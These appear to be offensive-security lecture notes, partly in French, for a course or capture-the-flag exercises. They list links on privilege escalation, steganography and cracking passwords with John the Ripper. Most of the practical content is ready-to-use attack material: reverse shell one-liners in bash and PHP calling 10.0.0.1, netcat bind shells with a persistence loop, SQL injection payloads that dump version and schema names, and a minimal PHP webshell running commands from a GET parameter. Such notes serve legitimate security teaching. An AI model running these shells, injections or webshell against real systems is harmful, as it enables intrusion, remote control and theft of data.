Cybersecurity Lecture notes
This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)
Interesting links
PrivESC
Windows Privilege Escalation CheatCheet
Linux Privilege Escalation Binary
Reserve shell
Ngrok : Exspose ports to Internet
Steganography
Aperi'Solve performs layer analysis on image
Tools
CyberChef : Encode and decode data
Download KALI linux live 2020.4
how to crack a password
Identify the type of hash
https://hashes.com/en/tools/hash_identifier
Use john the ripper (already installed on kali)
https://fr.wikipedia.org/wiki/John_the_Ripper
https://myhackingworld.com/crack-passwords-with-john-the-ripper/
Use a custom wordlist on john the ripper
https://gitlab.com/kalilinux/packages/wordlists/blob/kali/master/rockyou.txt.gz
Reverse/bind shell
#Reverse Shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’
socat file:`tty`,raw,echo=0 TCP-L:port
Bind shell
nc –lvp 4444 –e /bin/bash
#Add a bit of persistence:
while true; do nc –lvp 4444 –e /bin/bash; doneSQL exemples Payloads
https://portswigger.net/web-security/sql-injection/cheat-sheet
user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --PHP the most simple webshell
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
//Pour aller plus loin : https://github.com/flozz/p0wny-shell
?>Challenges
ETAPE 1
Fichiers de sauvegarde -> Astuce : dirb/mutations_common
ETPAE 2
ETAPE 3
String to decode
427261766f207475206120726575737369206c6520636816c6c656e6765
aidhaSBwZXJkdQ==
26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393bWifi challenge
WEP - https://ufile.io/h28b15y2
WPA2 - https://ufile.io/3qfmvxzn
Last updated